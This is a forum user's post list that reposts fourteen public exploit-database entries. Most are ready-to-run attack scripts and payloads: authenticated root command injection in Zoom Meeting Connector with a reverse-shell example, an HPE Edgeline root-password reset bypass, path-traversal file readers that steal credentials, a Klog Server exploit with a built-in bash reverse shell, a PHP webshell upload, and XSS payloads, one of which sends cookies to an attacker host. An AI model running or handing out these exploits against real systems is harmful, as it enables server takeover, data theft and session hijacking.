跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. # Exploit Title: Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated) # Date: 12-29-2020 # Exploit Author: Jeremy Brown # Vendor Homepage: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector # Software Link: https://support.zoom.us/hc/en-us/articles/201363093-Deploying-the-Meeting-Connector # Version: 4.6.239.20200613 #!/usr/bin/python # -*- coding: UTF-8 -*- # # zoomer.py # # Zoom Meeting Connector Post-auth Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # Dec 2020 # # The Meeting Connector Web Console listens on port 5480. On the dashboard # under Network -> Proxy, one can enable a proxy server. All of the fields # are sanitized to a certain degree, even the developers noting in the proxy() # function within backend\webconsole\WebConsole\net.py that they explicitly # were concerned with command injection and attempted to prevent it: # # if ('"' in proxy_name) or ('"' in proxy_passwd): # " double quotes cannot be used to prevent shell injection # is_valid = False # # It makes sense to leave some flexibility in the character limits here # passwords are often expected to contain more than alphanumeric characters. # But of course that means the Proxy Password field is still vulnerable to # command injection with the ` character. # # The proxy data gets concatenated and written to /etc/profile.d/proxy.sh. # Every three minutes, a task runs which executes this proxy script as root. # After submission the dashboard says “The proxy will take effect after the # server reboot!”, but the commands will still be executed within actually # requiring a reboot. Keep in mind that the commands will be executed blind. # # For example, `id>/tmp/proxy_test` given as the Proxy Password will produce # this in the /tmp/proxy_test file: # # uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023 # # MMR was tested, but Controller and VRC may also be vulnerable # # Usage # > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1" # login succeeded # command sent to server # # $ nc -u -lvp 5555 # .... # sh: no job control in this shell # sh-4.2# pwd # /root # sh-4.2# # # setenforce 0 if SELinux bothers you, service sshd start and add users/keys, # check tokens in /opt/zoom/conf/register, check out the local environment, etc. # # Dependencies # - pip install pyquery # # Fix # Zoom says they've fixed this in the latest version # import os import sys import argparse import requests import urllib.parse from pyquery import PyQuery from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) class Zoomer(object): def __init__(self, args): self.target = args.target self.port = args.port self.username = args.username self.password = args.password self.command = args.command def run(self): target = "https://" + self.target + ':' + str(self.port) session = requests.Session() session.verify = False # # get csrftoken from /login and use it to auth with creds # try: resp = session.get(target + "/login") except Exception as error: print("Error: %s" % error) return -1 try: csrftoken = resp.headers['set-cookie'].split(';')[0] except: print("Error: couldn't parse csrftoken from response header") return -1 csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken') if(csrfmiddlewaretoken == None): return -1 data = \ {'csrfmiddlewaretoken':csrfmiddlewaretoken, 'name':self.username, 'password':self.password} headers = \ {'Host':self.target + ':' + str(self.port), 'Referer':target, 'Cookie':csrftoken} try: resp = session.post(target + "/login", headers=headers, data=data) except Exception as error: print("Error: %s" % error) return -1 if(resp.status_code != 200 or 'Wrong' in resp.text): print("login failed") return -1 else: print("login succeeded") # # get csrfmiddlewaretoken from /network/proxy and post cmd # try: resp = session.get(target + "/network/proxy") except Exception as error: print("Error: %s" % error) return -1 csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken') cookies = session.cookies.get_dict() # # this happens with view-only users # if(len(cookies) < 2): print("Error: failed to get session ID") return -1 command = '`' + self.command + '`' headers = \ {'Host':self.target + ':' + str(self.port), 'Referer':target, 'Cookie': \ 'csrftoken=' + cookies['csrftoken'] + ';' + \ 'sessionid=' + cookies['sessionid']} data = \ {'csrfmiddlewaretoken':csrfmiddlewaretoken, 'proxyValue':1, 'proxyAddr':'localhost', 'proxyPort':8080, 'proxyName':'test', 'proxyPasswd':command} try: resp = session.post(target + "/network/proxy", headers=headers, data=data) except Exception as error: print("Error: %s" % error) return -1 if(resp.status_code != 200): print("something failed") return -1 else: print("command sent to server") return 0 def get_token(self, body, name): token = None pq = PyQuery(body) if(name == 'csrftoken'): print("csrftoken") if(name == 'csrfmiddlewaretoken'): token = pq('input').attr('value') return token def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="Zoom server") parser.add_argument("-p", "--port", type=int, default=5480, help="Zoom port") parser.add_argument("username", type=str, help="Valid username") parser.add_argument("password", type=str, help="Valid password") parser.add_argument("command", type=str, help="Command to execute (replace space with $IFS ?)") args = parser.parse_args() return args def main(): args = arg_parse() zm = Zoomer(args) result = zm.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main()
  2. # Exploit Title: HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities # Date: 12-28-2020 # Exploit Author: Jeremy Brown # Vendor Homepage: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a # Software Link: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_f62aaafe780a496dad6d28621a # Version: 1.0 #!/usr/bin/python # -*- coding: UTF-8 -*- # # billhader.py # # HPE Edgeline Infrastructure Manager Multiple Remote Vulnerabilities # # Jeremy Brown [jbrown3264/gmail] # Dec 2020 # # In \opt\hpe\eim\containers\api\eim\api\urls.py, some private paths are defined # which are intended to only be accessible via the local console. # # path('private/AdminPassReset', views.admin_password_reset), <-- ice # path('private/ResetAppliance', views.reset_appliance), <-- ice # path('private/EIMApplianceIP', views.get_eim_appliance_ips), <-- boring # # These are meant to only be exposed for the local GUI so admins can perform # functions without authenticating. The way do they do this is by checking the # Host header and returning a 404 not found for not-localhost, but 200 OK for # 127.0.0.1. This is of course flawed because any remote user has control over # the Host header and they can call these functions with valid JSON, eg. # /private/AdminPassReset to reset the admin password and login via SSH (default) # as root due to the Administrator and root always synced to the same password. # They can also call ResetAppliance and the appliance will immediately reset # user data and cause the entire server to reboot. # # Administrator is the default and permanent web console user and as mentioned it's # tied to the root OS user account. When Administrator changes their password, the # backend changes the root password to the same. Other users can be added to the # web console, but there is nothing stopping them changing any other user’s password. # Not even sure if this is a bug or just wow functionality because although the # users appear different, they all seem to share the same role. Broken or incomplete # design I guess. So any user can change the Administrator password and use it to # login as root via the default open SSH server, start setting up camp, etc. # # Usage examples # > billhader.py 10.0.0.10 pre_root_passwd -n letmein # {"RootPasswd": "Modified", "UserPassword": "Modified"} # # > ssh [email protected] # [email protected]'s password: [letmein] # [root@hpe-eim ~]# # # > billhader.py 10.0.0.10 post_root_passwd -u test -p abc123 # login succeeded # {"Status": "success", "Valid_Entries": ["Password"], "Invalid_Entries": []} # # (root password is now newpassword default of 'letmein') # # > billhader.py 10.10.10.20 pre_factory_reset # Lost your password huh? Are you sure you want to factory reset this server? # yes # done # import os import sys import argparse import requests import urllib.parse import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) BINGO = '127.0.0.1' # not localhost :') DEFAULT_PORT = 443 class BillHader(object): def __init__(self, args): self.target = args.target self.action = args.action self.newpassword = args.newpassword self.username = args.username self.password = args.password def run(self): target = "https://" + self.target + ':' + str(DEFAULT_PORT) session = requests.Session() session.verify = False if(self.action == 'pre_root_passwd'): headers = {'Host':BINGO} data = \ {'Password':self.newpassword, 'ConfirmPassword':self.newpassword} try: resp = session.post(target + "/private/AdminPassReset", headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("%s" % resp.text) if(self.action == 'post_root_passwd'): data = \ {'UserName':self.username, 'Password':self.password} try: resp = session.post(target + "/redfish/v1/SessionService/Sessions", data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 if(resp.status_code != 201): print("login failed") return -1 else: print("login succeeded") try: token = resp.headers['x-auth-token'] except: print("Error: couldn't parse token from response header") return -1 if(token == None): print("Error: couldn't parse token from session") return -1 headers = {'X-Auth-Token':token} data = {'Password':self.newpassword} try: resp = session.patch(target + "/redfish/v1/AccountService/Accounts/1", headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("%s" % resp.text) if(self.action == 'pre_factory_reset'): print("Lost your password huh? Are you sure you want to factory reset this server?") choice = input().lower() if('yes' not in choice): print("cool, exiting") return -1 headers = {'Host':BINGO} data = {'ResetRequired':'true'} try: resp = session.post(target + "/private/ResetAppliance", \ headers=headers, data=json.dumps(data)) except Exception as error: print("Error: %s" % error) return -1 print("done") return 0 def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="EIM host") parser.add_argument("action", type=str, choices=['pre_root_passwd', 'post_root_passwd', 'pre_factory_reset'], help="Which action to perform on the server") parser.add_argument("-n", "--newpassword", type=str, default="letmein", help="New password to set for root account (letmein)") parser.add_argument("-u", "--username", type=str, help="Valid username (for post_root_reset)") parser.add_argument("-p", "--password", type=str, help="Valid password (for post_root_reset)") args = parser.parse_args() return args def main(): args = arg_parse() bill = BillHader(args) result = bill.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main()
  3. # Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal # Date: 12/12/2018 (PoC) # Date: 04/01/2020 (Auto Exploit) # Exploit Author: SunCSR (Sun* Cyber Security Research) # Google Dork: intitle:"Responsive FileManager 9.x.x" # Vendor Homepage: http://responsivefilemanager.com/ # Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4 # Version: < 9.13.4 # Tested on: Linux 64bit + Python3 #!/usr/bin/python3 # Usage: python exploit.py [URL] [SESSION] [File Path] # python3 exploit.py http://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd import requests import sys def usage(): if len(sys.argv) != 4: print("Usage: python3 exploit.py [URL]") sys.exit(0) def copy_cut(url, session_cookie, file_name): headers = {'Cookie': session_cookie, 'Content-Type': 'application/x-www-form-urlencoded'} url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url) r = requests.post( url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers) return r.status_code def paste_clipboard(url, session_cookie): headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'} url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url) r = requests.post( url_paste, data="path=", headers=headers) return r.status_code def read_file(url, file_name): name_file = file_name.split('/')[-1] url_path = "%s/source/%s" % (url,name_file) #This is the default directory, #if the website is a little different, edit this place result = requests.get(url_path) return result.text def main(): usage() url = sys.argv[1] session_cookie = sys.argv[2] file_name = sys.argv[3] print("[*] Copy Clipboard") copy_result = copy_cut(url, session_cookie, file_name) if copy_result==200: paste_result = paste_clipboard(url, session_cookie) else: print("[-] Paste False") if paste_result==200: print("[*] Paste Clipboard") print(read_file(url, file_name)) else: print("[-] Copy False") if __name__ == "__main__": main()
  4. # Exploit Title: Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission # Date: 21.12.2020 # Exploit Author: Adrian Bondocea # Vendor Homepage: https://www.fluentd.org/ # Software Link: https://td-agent-package-browser.herokuapp.com/4/windows # Version: <v4.0.1 # Tested on: Windows 10 x64 # CVE : CVE-2020-28169 # External URL: https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169 Description: The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM. Vulnerable Path: ( Authenticated Users have permission to write within the location ) PS C:\opt\td-agent\bin> icacls C:\opt\td-agent\bin C:\opt\td-agent\bin BUILTIN\Administrators:(I)(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) NT AUTHORITY\Authenticated Users:(I)(M) NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) Successfully processed 1 files; Failed processing 0 files Vulnerable service: PS C:\opt\td-agent\bin> get-service fluentdwinsvc Status Name DisplayName ------ ---- ----------- Running fluentdwinsvc Fluentd Windows Service Service Path: "C:/opt/td-agent/bin/ruby.exe" -C t"C:/opt/td-agent/lib/ruby/gems/2.7.0/gems/fluentd-1.11.2/lib/fluent/command/.." winsvc.rb --service-name fluentdwinsvc
  5. # Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting # Date: 2020/12/28 # Exploit Author: SunCSR # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.2.9 # Tested on: CSZ CMS 1.2.9 1. Reflected XSS Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc <http://localhost/pluginabc%22-alert%28origin%29-%22abc> 2. Stored XSS Use an editor account with rights to manage banners, plugins. + Banner Manager: - Add or edit banner: Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> + Plugin Manager: - Add or edit album(/admin/plugin/gallery): Album Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> Short Description field: <noframes><p title="</noframes><svg/onload=alert(origin)>"> - Add or edit Category(/admin/plugin/article/): Category Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
  6. # Exploit Title: Cassandra Web 0.5.0 - Remote File Read # Date: 12-28-2020 # Exploit Author: Jeremy Brown # Vendor Homepage: https://github.com/avalanche123/cassandra-web # Software Link: https://rubygems.org/gems/cassandra-web/versions/0.5.0 # Version: 0.5.0 # Tested on: Linux #!/usr/bin/python # -*- coding: UTF-8 -*- # # cassmoney.py # # Cassandra Web 0.5.0 Remote File Read Exploit # # Jeremy Brown [jbrown3264/gmail] # Dec 2020 # # Cassandra Web is vulnerable to directory traversal due to the disabled # Rack::Protection module. Apache Cassandra credentials are passed via the # CLI in order for the server to auth to it and provide the web access, so # they are also one thing that can be captured via the arbitrary file read. # # Usage # > cassmoney.py 10.0.0.5 /etc/passwd # root:x:0:0:root:/root:/bin/bash # daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin # bin:x:2:2:bin:/bin:/usr/sbin/nologin # ... # # > cassmoney.py 10.0.0.5 /proc/self/cmdline # /usr/bin/ruby2.7/usr/local/bin/cassandra-web--usernameadmin--passwordP@ssw0rd # # (these creds are for auth to the running apache cassandra database server) # # Fix # - fixed in github repo # - v0.6.0 / ruby-gems when available # (still recommended to containerize / run this in some sandbox, apparmor, etc) # import os import sys import argparse import requests import urllib.parse SIGNATURE = 'cassandra.js' # # /var/lib/gems/2.7.0/gems/cassandra-web-0.5.0/app/public # DT = '../' DT_NUM = 8 class CassMoney(object): def __init__(self, args): self.target = args.target self.file = args.file self.port = args.port self.force = args.force self.number = args.number def run(self): target = "http://" + self.target + ':' + str(self.port) payload = urllib.parse.quote_plus(DT * self.number + self.file) try: deskpop = requests.get(target) except Exception as error: print("Error: %s" % error) return -1 if(SIGNATURE not in deskpop.text and self.force == False): print("Target doesn't look like Cassandra Web, aborting...") return -1 try: req = requests.get(target + '/' + payload) except: print("Failed to read %s (perm denied likely)" % self.file) return -1 if(SIGNATURE in req.text): print("Failed to read %s (bad path?)" % self.file) return -1 if(len(req.text) == 0): print("Server returned nothing for some reason") return 0 print("\n%s" % req.text) return 0 def arg_parse(): parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="Cassandra Web Host") parser.add_argument("file", type=str, help="eg. /etc/passwd, /proc/sched_debug + /proc/<cass-web-pid>/cmdline") parser.add_argument("-p", "--port", type=int, default=3000, help="Cassandra Web Port") parser.add_argument("-f", "--force", default=False, action='store_true', help="Run the payload even if server isn't Cassandra Web") parser.add_argument("-n", "--number", type=int, default=DT_NUM, help="Adjust the number of dot-dot-slash") args = parser.parse_args() return args def main(): args = arg_parse() cm = CassMoney(args) result = cm.run() if(result > 0): sys.exit(-1) if(__name__ == '__main__'): main()
  7. # Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated) # Date: 22.12.2020 # Exploit Author: b3kc4t (Mustafa GUNDOGDU) # Vendor Homepage: https://www.klogserver.com/ # Version: 2.4.1 # Tested On: Ubuntu 18.04 # CVE: 2020-35729 # Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER """ ~ VULNERABILITY DETAILS ~ # The Klog Server runs the injected os commands on the server , causing os command injection vulnerability. # The following python code will inject os command payload and can be relaized reverse shell connection.And you can be added payload except the default payload plugin. ##USAGE## $sudo nc -nlvp 98 $sudo python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\"" ##OUTPUT## bash-4.2$whoami apache bash-4.2$ """ import requests import argparse from colorama import Fore, Back, Style, init def main(): desc = "KLOG SERVER 2.4.1 EXPLOIT" parser = argparse.ArgumentParser(description=desc) option = parser.add_argument_group('[*]OPTIONS[*]') parser.add_argument("--url", help=Fore.GREEN+"[*]TARGET URL ADDRESS[*]", required=False) parser.add_argument("--payload",help=Fore.GREEN+"[*] TO ADD PAYLOAD [*]", type=str,required=False) parser.add_argument("--exploit", help=Fore.GREEN+" ", action="store_true") args = parser.parse_args() if args.exploit: if args.url: url = args.url if args.payload: payload = args.payload target_send_config(url, payload) #default bash reverse shell payload else: payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\"" target_send_config(url, payload) else: #default url (klog server init ip address) url = "https://10.10.56.51:443/actions/authenticate.php" if args.payload: payload = args.payload target_send_config(url, payload) else: payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\"" target_send_config(url, payload) def target_send_config(url, payload): headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Connection": "close", "Upgrade-Insecure-Requests": "1"} #injection place data = {"user": payload, "pswd": "test"} try: #post method send requests.post(url, headers=headers, data=data, verify=False) print(" ") print(Fore.GREEN+" "+"[+] EXPLOIT SUCCESSFUL PAYLOAD IS SENT [+]") except: print(Fore.RED+"[-] EXPLOIT FAILED [-]") if __name__ == '__main__': main()
  8. # Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting # Date: 30-12-2020 # Exploit Author: Mesut Cetin # Vendor Homepage: http://egavilanmedia.com # Version: 1.0 # Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34 Vulnerable parameter: email, gender, username Payload: <script>alert(document.cookie)</script> Proof of Concept: To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps: 1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php 2. Click above right on the "Profile" tab 3. Navigate to the "Edit Profile" tab 4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page. 5. Capture the POST request in Burp Suite and manipulate the parameter as shown: POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1 Host: demo.egavilanmedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin: http://demo.egavilanmedia.com Connection: close Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin 6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.
  9. # Exploit Title: Online Learning Management System 1.0 - RCE (Authenticated) # Date: 01.01.2021 # Exploit Author: Bedri Sertkaya # Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 / WAMP Server import requests cmd = "start cmd.exe" # Command to execute target = "http://192.168.1.101/lms" # username = "21100867" password = "heni" # Login and get session_cookie url = target+"/login.php" headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-A=gent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML=, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://192.168.1.10=1", "Referer": "http://192.168.1.101/lms/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} data = {"username": username, "password": password} s = requests.post(url, headers=headers, data=data) session_cookie = s.cookies.get_dict() # Upload Shell burp0_url = target+"/student_avatar.php" burp0_cookies = session_cookie burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.101", "Content-Type": "multipart/form-data; boundary----WebKitFormBoundarybHBgGwgOFblz5IgL", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0=.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.101/lms/student_notification.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} burp0_data = "------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"image\"; filename=\"exploit.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nshell_exec('"+cmd+"');\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"change\"\r\n\r\n\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) # Trigger exploit trigger_url = "http://192.168.1.101:80/lms/admin/uploads/exploit.php" trigger_cookies = session_cookie requests.get(trigger_url, cookies=trigger_cookies)
  10. # Exploit Title: dirsearch 0.4.1 - CSV Injection # Author: Dolev Farhi # Date: 2021-01-05 # Vendor Homepage: https://github.com/maurosoria/dirsearch # Version : 0.4.1 # Tested on: Debian 9.13 dirsearch, when used with the --csv-report flag, writes the results of crawled endpoints which redirect(, to a csv file without sanitization. A malicious server can redirect all of its routes/paths to a path that contains a comma and formula, e.g. /test,=1336+1, and escape the normal dirsearch CSV structure to inject its own formula. Malicious Flask Webserver: """ from flask import Flask, redirect app = Flask(__name__) @app.route('/') def index(): return redirect('/test,=1336+1') @app.route('/admin') def admin(): return redirect('/test,=1336+1') @app.route('/login') def login(): return redirect('/test,=1336+1') """ 2. Tester runs dirsearch root@host:~/# python3 dirsearch.py -u http://10.0.0.1 --csv-report=report.csv _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 30 | Wordlist size: 2 Error Log: /root/tools/dirsearch/logs/errors-21-01-06_04-29-10.log Target: http://10.0.0.1 Output File: /root/tools/dirsearch/reports/10.0.0.1/_21-01-06_04-29-10.txt [04:29:10] Starting: [04:29:11] 302 - 233B - /admin -> http://10.0.0.1/test,=1336+1 [04:29:11] 302 - 233B - /login -> http://10.0.0.1/test,=1336+1 3. Result CSV root@host:~/# cat report.csv Time,URL,Status,Size,Redirection Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/admin,302,233,http://10.0.0.1/test,=1336+1 Wed Jan 6 04:29:11 2021,http://10.0.0.1:80/login,302,233,http://10.0.0.1/test,=1336+1
  11. # Exploit Title: IObit Uninstaller 10 Pro - Unquoted Service Path # Date: 2020–12–24 # Exploit Author: Mayur Parmar(th3cyb3rc0p) # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/en/advanceduninstaller.php # Version: 10 # Tested on Windows 10 Unquoted Service Path: When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument. Attack Vector: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Steps to reproduce: C:\Windows\system32>sc qc IObitUnSvr [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IObitUnSvr TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IObit Uninstaller Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem Mitigation:Ensure that any services that contain a space in the path enclose the path in quotes. Reference: -> https://www.rapid7.com/db/modules/exploit/windows/local/unquoted_service_path/ -> https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae -> https://www.hackingarticles.in/windows-privilege-escalation-unquoted-path-service/ -> https://sec-consult.com/blog/detail/windows-privilege-escalation-an-approach-for-penetration-testers/
  12. # Exploit Title: Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF) # Date: 06/01/2021 # Exploit Author: Rahul Ramakant Singh # Vendor Homepage: https://www.awbs.com/ # Version: 3.7.0 # Tested on Windows Steps: 1. Login into the application with the help of email and password. 2. Navigate to my additional contact page and add one contact for the same 3. Now there is option for delete the contact from the list. 4. Now Logout from the application and same create a one CSRF POC having having action of delete contact and same blank the token value from CSRF POC. 5. Now again login into the application and Send a link of this crafted page(generated CSRF POC) to the victim. 6. When the victim user opens the link, a script present on the crafted page sends a request for delete of contact to the server with an active session ID of the victim and accept the blank token value from the request. 7. Contact successfully deleted.
  13. # Exploit Title: Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting # Exploit Author: Shivam Verma(cyb3r_n3rd) # Date: 2021-01-05 # Vendor Homepage: https://code-projects.org/expense-tracker-in-php-with-source-code/ # Software Link: https://code-projects.org # Version: 1.0 # Category: Web Application # Tested on: Kali Linux # Contact: https://www.linkedin.com/in/shivam413 Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Expense Category section and Paste the Payload in the Desired field each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data in Plain Text Step 1. Install The Software Step 2. Click on Add Expense Category Step 3. Now paste your Xss Payload in the Parameter(Expense Name) Step 4. Click on Add Step 5. Wait for the Administrator to click on Your link Step 6. You will receive Admin Cookie Every time he Process the Request --- XSS Payload: "><script src=https://.xss.ht></script>
  14. # Exploit Title: WordPress Plugin litespeed-cache 3.6 - 'server_ip' Cross-Site Scripting # Date: 20-12-2020 # Software Link: https://downloads.wordpress.org/plugin/litespeed-cache.3.6.zip # Version: litespeed-cache # Tested on: Windows 10 x64 # Description: # A Stored Cross-site scripting (XSS) was discovered in wordpress plugins litespeed-cache 3.6 # One parameters(server_ip) have Cross-Site Scripting. POST /wp-admin/admin.php?page=litespeed-general HTTP/1.1 Host: localhost Content-Length: 374 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/wp-admin/admin.php?page=litespeed-general Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7C27d97999284897d8645200c65a7f508dffef6a9184800b2905627ccbd4d71806; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=9effc614452472ce40565e73d3f4301c; wordpress_logged_in_a5beef43d228c89cc1d954ec4fcadda1=admin%7C1609289111%7CM6c2pV6VbnD2OElpSET6Aw3GhKFJBGdgetyfHtqxJkC%7Cd7e1a2a77822d410d7ebe2540b88dc68f908a031ceda6e884995ff419bfb6b38; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1609116311 Connection: close LSCWP_CTRL=save-settings&LSCWP_NONCE=af21ea74b2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dlitespeed-general&_settings-enroll%5B%5D=auto_upgrade&auto_upgrade=0&_settings-enroll%5B%5D=api_key&api_key=&_settings-enroll%5B%5D=server_ip&server_ip=%3Cscript%3Ealert%28%27Hoa%27%29%3C%2Fscript%3E&_settings-enroll%5B%5D=news&news=1&litespeed-submit=Save+Changes
